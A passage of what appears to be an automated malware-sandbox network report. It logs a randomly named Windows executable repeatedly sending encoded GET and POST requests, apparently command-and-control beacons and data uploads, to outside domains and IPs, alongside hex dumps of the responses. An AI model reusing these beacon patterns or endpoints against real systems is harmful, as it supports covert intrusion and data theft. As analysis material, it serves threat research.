VzK4o8Jx=9JO441eEy3RNVmKl7uEP5VpkX4CMoo0P45c3uzfgHMLBtVl+kEV3St2j0sRoZ7jSnD2wRyvQAtIEimK7xMo4kPFNrPt5oDtMoI9wQKcHuLX+ARAT2khZTUlJOQZqQWwlUhQQl5WuZaqHD0WhTiour9Pj/83xwzfUPoYeef5W0+p33IVdB1elQfLMAKdiTFgNHLufxTrMZIpcmBV/MJZnUqUPc7mmRdAzPGWaIUbpNC/GIzzC7iNW/6DFaOhc6oJ6wZ1S7YyF+DMaug1dNcetOF/jq6Xx/6oJ1XdoaZbiXsjsggRKx6Ep6k4J0aOI+wnlhEA5zQwJtSmPQLrLZwYwUkoMKG2UzbQ9zc17wEJhowUPtvbfA/k69eBVPUz2VgeIntKqeSz3047TZlld+136vALFMd6kfL7Ko9nmrrRYT5rlG7iqRCdVkAu871euVe7zscQGRZE85ob6g/94qpESxIAfr0IJgjtCuErP5/YR/+7PhTL0EcueVgl71nbjl/kvoBIcbKoPKYl8wg1CBIhjbpX/SW17idP7ROZ3WMD9wPDNG8jHGK9R41aVgzz73gJvD0GES/JFfofnErZHo7fvaf5L+1/7jGZ+t273DKoOVIsVN5W7F1C8dvg+1HCCcJovTnoww4vlYz1+6AJVoK4dkyWlFvxVeJlm5h2YHPDebv3eUqSUxNeGY6YpzuMRg7bMYoXsyx3B98W95qX9mSSYeGwiKcFJ2AA9+Qet4NJiAWD6k/pAuef6R+h0xV4HjNHR9eXwcvjHRV/I5ORuAI/8dMPle1crxijHsiGjrf1mdpwDV49OaKOvQpDhTqXRmBuFL7Pym9UOPO/ySK5a5KJOzJKRGQ7qBEM4OXMoX17ZUTy0SKJP64BgB0+Ha+dk/hIv1VgbSbnlUVWqtJ6E4TW1d9b6ALsQ1OeHMyBW/Sr0oHvoMck1WAE/Kb7qtWl6miPLiFKvGjC4N/7pj0FTHKXGXnF5OQA+WuJmxWhUTXJdl8B [TRUNCATED]
Oct 7, 2024 11:51:31.232054949 CEST	1289	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Mon, 07 Oct 2024 09:51:31 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Oct 7, 2024 11:51:31.232606888 CEST	846	IN	Data Raw: c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 90 1f 13 58 fc 28 33 52 6c e9 a9 bd c2 43 1a 8f 54 42 68 18 8f 70 3d e5 35 6a 1e d8 f1 ba 21 51 0d 3d 48 61 ab b9 a0 39 aa 64 e0 47 ee 53 a1 4a 3d 52 43 b9 0d Data Ascii: %oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.Q"xX[iokc:8W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.30	49768	217.160.0.27	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:51:33.763830900 CEST	389	OUT	GET /4yov/?VzK4o8Jx=wLmY7AOB32o0S2u43NcX1Hs/A4Ddj7cy6rFAsgDZdNn+sW1g/TF+eJLR19ZQOPzynTi6ZGviANY3o1+5ycRVlJFFydx+2g9CgM5kEaITnei6fXkYmlY6f3w=&0zu8A=o2yln6 HTTP/1.1 Host: www.concept.pink Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Oct 7, 2024 11:51:33.948555946 CEST	1289	IN	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 4545 Connection: close Date: Mon, 07 Oct 2024 09:51:33 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
Oct 7, 2024 11:51:33.948638916 CEST	1289	IN	Data Raw: 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31 2c 31 35 2e 37 63 2d 32 2e 31 2c 30 2d 33 2e 37 2c 30 2d 35 2e 32 2d 2e 31 76 31 38 61 31 2e 34 2c 31 2e 34 2c 30 2c 30 2c 31 2d 31 2e 35 2c 31 2e 36 48 36 39 Data Ascii: 10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.5.2,1.5,1.5v.9c-.1.6-.2,1.5-1.6,1.5M97.2,35.2H95.1a2.
Oct 7, 2024 11:51:33.948714972 CEST	1289	IN	Data Raw: 2e 33 2c 34 2e 34 2c 32 2e 33 2c 33 2e 36 2d 2e 37 2c 34 2e 34 2d 32 2e 33 2e 38 2d 34 2e 32 2e 38 2d 36 2e 31 2d 2e 31 2d 34 2e 36 2d 2e 38 2d 36 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 2e 33 20 2d 32 2e Data Ascii: .3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.3H3.6A2.26,2.26,0,0,0,1.3,14V32.7A2.26,2.26,0,0,0,3.6,35H22.4a2.26,2.26,0,0,0,2.3-2.3C24.8,32.7,24.9,14,24
Oct 7, 2024 11:51:33.948772907 CEST	816	IN	Data Raw: 45 65 6e 20 77 65 62 69 6e 68 6f 75 64 20 77 65 72 64 20 6e 6f 67 20 6e 69 65 74 20 74 6f 65 67 65 76 6f 65 67 64 2e 3c 2f 64 69 76 3e 0d 0a 20 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 Data Ascii: Een webinhoud werd nog niet toegevoegd.</div> <div style="padding-bottom: 30px" lang="fr"><span style="font-size: 14px; color: #777; font-weight: bold;">Français</span><br>Cette page web vient juste d'être activée

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.30	49769	38.55.251.233	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:51:48.931035995 CEST	668	OUT	POST /j39u/ HTTP/1.1 Host: www.kuaimaolife.shop Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.kuaimaolife.shop Referer: http://www.kuaimaolife.shop/j39u/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 4d 78 64 2f 33 71 50 57 59 48 66 78 55 33 70 51 42 55 65 63 42 35 5a 66 4b 4e 6e 73 2b 51 30 48 71 46 78 44 6c 55 46 71 75 2f 67 66 51 67 42 74 4a 51 6b 72 4e 41 68 62 59 66 48 2f 39 51 30 73 36 44 4c 54 66 6b 50 69 66 69 71 68 7a 42 53 52 46 6d 74 42 67 48 64 31 50 32 50 58 4e 75 47 31 41 4a 6d 66 62 4c 50 52 38 36 78 74 2f 44 6e 51 68 37 51 2b 4a 6a 4a 48 44 33 6f 57 69 6d 50 2b 6b 4d 69 30 45 62 38 4a 6d 51 4b 2f 79 53 57 6f 31 55 50 44 52 38 65 43 32 79 34 63 55 4e 39 6d 69 61 51 79 56 6a 47 68 4b 75 6f 71 61 34 74 74 55 5a 43 68 53 34 42 45 2b 74 56 47 41 48 34 46 54 67 3d 3d Data Ascii: VzK4o8Jx=Mxd/3qPWYHfxU3pQBUecB5ZfKNns+Q0HqFxDlUFqu/gfQgBtJQkrNAhbYfH/9Q0s6DLTfkPifiqhzBSRFmtBgHd1P2PXNuG1AJmfbLPR86xt/DnQh7Q+JjJHD3oWimP+kMi0Eb8JmQK/ySWo1UPDR8eC2y4cUN9miaQyVjGhKuoqa4ttUZChS4BE+tVGAH4FTg==
Oct 7, 2024 11:51:49.240433931 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 07 Oct 2024 09:51:49 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.30	49770	38.55.251.233	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:51:51.765125036 CEST	688	OUT	POST /j39u/ HTTP/1.1 Host: www.kuaimaolife.shop Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.kuaimaolife.shop Referer: http://www.kuaimaolife.shop/j39u/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 4d 78 64 2f 33 71 50 57 59 48 66 78 58 55 78 51 4e 58 6d 63 51 4a 5a 51 57 39 6e 73 30 77 30 44 71 46 74 44 6c 56 41 76 76 4b 49 66 51 43 5a 74 4b 52 6b 72 4d 41 68 62 54 2f 48 36 33 77 30 6a 36 44 47 6d 66 6c 6a 69 66 69 75 68 7a 45 75 52 46 52 52 4f 68 58 64 7a 61 6d 50 56 51 65 47 31 41 4a 6d 66 62 4c 61 30 38 36 70 74 2f 77 50 51 6e 61 51 39 58 7a 4a 45 55 48 6f 57 6d 6d 50 36 6b 4d 6a 58 45 59 34 7a 6d 54 79 2f 79 51 4f 6f 32 47 6e 4d 66 38 65 41 72 69 35 4d 55 4e 49 44 6d 5a 6b 45 59 6a 4b 6a 4d 72 56 50 66 76 63 33 4a 61 32 6a 42 59 39 70 69 73 34 75 43 46 35 65 4f 6a 4a 4f 74 49 46 54 4c 64 63 62 62 44 6f 61 2f 5a 6a 70 6a 76 6b 3d Data Ascii: VzK4o8Jx=Mxd/3qPWYHfxXUxQNXmcQJZQW9ns0w0DqFtDlVAvvKIfQCZtKRkrMAhbT/H63w0j6DGmfljifiuhzEuRFRROhXdzamPVQeG1AJmfbLa086pt/wPQnaQ9XzJEUHoWmmP6kMjXEY4zmTy/yQOo2GnMf8eAri5MUNIDmZkEYjKjMrVPfvc3Ja2jBY9pis4uCF5eOjJOtIFTLdcbbDoa/Zjpjvk=
Oct 7, 2024 11:51:52.069983006 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 07 Oct 2024 09:51:51 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.30	49771	38.55.251.233	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:51:54.608366966 CEST	2578	OUT	POST /j39u/ HTTP/1.1 Host: www.kuaimaolife.shop Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.kuaimaolife.shop Referer: http://www.kuaimaolife.shop/j39u/ Connection: close Content-Length: 3341 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 4d 78 64 2f 33 71 50 57 59 48 66 78 58 55 78 51 4e 58 6d 63 51 4a 5a 51 57 39 6e 73 30 77 30 44 71 46 74 44 6c 56 41 76 76 4d 51 66 51 33 4e 74 4b 79 4d 72 50 41 68 62 61 66 48 37 33 77 30 45 36 44 4f 71 66 6c 2b 5a 66 67 6d 68 78 69 61 52 4e 46 46 4f 30 48 64 7a 59 6d 50 55 4e 75 48 68 41 4e 4b 44 62 4c 4b 30 38 36 70 74 2f 32 7a 51 67 4c 51 39 56 7a 4a 48 44 33 6f 67 69 6d 50 65 6b 4e 47 73 45 62 55 6a 6d 51 43 2f 31 6e 4b 6f 31 31 50 4d 66 38 65 41 2f 53 35 4a 55 4e 55 4f 6d 5a 39 44 59 68 71 5a 4d 62 35 50 64 36 74 68 5a 4c 32 61 56 49 68 6d 6c 66 70 54 4f 6c 78 62 41 69 35 4c 74 4c 35 59 4a 50 63 47 56 46 63 6a 71 36 7a 4b 39 34 72 6b 50 78 72 39 33 44 74 65 69 46 73 6d 5a 4d 75 75 76 70 34 48 48 7a 72 62 77 42 74 50 71 4d 64 78 51 44 34 53 2b 42 4c 39 75 70 71 72 34 4a 64 50 6a 6f 70 33 46 47 78 42 4f 67 31 31 39 62 67 49 66 31 4f 72 67 6f 30 77 4a 6a 37 4c 76 78 7a 59 70 4a 65 30 43 62 2b 41 77 46 43 49 4c 2b 44 42 35 35 6d 2f 30 77 30 51 47 49 4f 4b 6c 5a 4d 45 6b [TRUNCATED] Data Ascii: VzK4o8Jx=Mxd/3qPWYHfxXUxQNXmcQJZQW9ns0w0DqFtDlVAvvMQfQ3NtKyMrPAhbafH73w0E6DOqfl+ZfgmhxiaRNFFO0HdzYmPUNuHhANKDbLK086pt/2zQgLQ9VzJHD3ogimPekNGsEbUjmQC/1nKo11PMf8eA/S5JUNUOmZ9DYhqZMb5Pd6thZL2aVIhmlfpTOlxbAi5LtL5YJPcGVFcjq6zK94rkPxr93DteiFsmZMuuvp4HHzrbwBtPqMdxQD4S+BL9upqr4JdPjop3FGxBOg119bgIf1Orgo0wJj7LvxzYpJe0Cb+AwFCIL+DB55m/0w0QGIOKlZMEkJwYvnBQ86l8/dfOwOR0kArLNUqR5Y6YiINfnijCY0qZSEwT7kZ64YBYh2vdwJpPEwsWaQYDuoxqiP9VLz935/YOSwUo2yiRyESLtURcBFVhGcZKd2iiupBjd2QXe5HoG16HuXYAUASD2bCxqLNl3q29ZNi5oXlaFsXan9fWG16EGoGlBkfG7WRhSZWncAWoPxuLn5u0oM90w0bRx90i26arxcB0cNSCZjiXg7x1iCFl1kDlxmGFeE/8+n9xeUM4mnOwdZ63yXXLjCYebk/NUIoKWwwRSvG8i3lPDMtv3OaNJpX4T7Hz3dOOLhRbXsH8Z6BtnI/zkUNoPCe1AqtB4bi+0SD8FyiBWwmctZZTqOk2D5tMVw8sPDQmkebruFEAjuTC0cLwPNd1nZmiPPJ500EbkdE48JXgllUTUwEyELUyEIr3//s+wpw7hPaPq/mhjxbCGjtU7uwnYvr9X9a0SkMxImXd66n6vxwNWe/G0vvYOoqx1g5jpP7V7lutus5m0/OzvgewsoprJZpllD8DuiJUPJL6y4IK5APw8R0VsDod0hy3TImGJPaccnL+3C/ix+YW5cmXSQBfsAOPDgJrpTJyerMlTv9lz01UEuuL2qXeRfKxdqbzgQEDVrz9pnw7HQZ2Yib9PGyjVm61itSXCV8Fn9+SXU9TbmB [TRUNCATED]
Oct 7, 2024 11:51:54.608388901 CEST	1227	OUT	Data Raw: 59 73 72 78 34 51 2f 77 6b 6a 32 35 4f 48 71 6a 6c 73 4c 45 7a 55 31 75 76 76 55 4f 7a 58 32 65 59 61 70 39 72 50 4b 6e 4d 59 70 53 48 50 37 66 4e 51 75 67 4b 74 30 7a 6b 46 37 5a 4f 6a 4a 63 76 2f 50 6b 39 2b 72 70 72 73 64 38 4f 4d 6e 6b 63 46 Data Ascii: Ysrx4Q/wkj25OHqjlsLEzU1uvvUOzX2eYap9rPKnMYpSHP7fNQugKt0zkF7ZOjJcv/Pk9+rprsd8OMnkcFAk7K96IJExKj5WAiK542c74IM7YeT76QEjIsAEGFX/oy4Djhk1wWFr25pwQvActY8tiCM17PlqJlQUlJKSoUBQ7KoDhrznCpLeoPVMMyx8GRKJt9YM7eG/BboouJ7PEVP9a/6gEgc8eFfj9oemdIk2Enb3jSOSXv3
Oct 7, 2024 11:51:54.912909031 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 07 Oct 2024 09:51:54 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.11.30	49772	38.55.251.233	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:51:57.444819927 CEST	393	OUT	GET /j39u/?VzK4o8Jx=Bz1f0c7bYWyPEXgQGmGeUr0iAf+T5y0lnFtnj2cpqvgmCRIzB1oQIQU/LvP87UgGwTfaSD+LVTW+9AK3Nxg5tSpiWXbGTNqEKdm6W6Th2Oxx8WLr56YoU0o=&0zu8A=o2yln6 HTTP/1.1 Host: www.kuaimaolife.shop Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
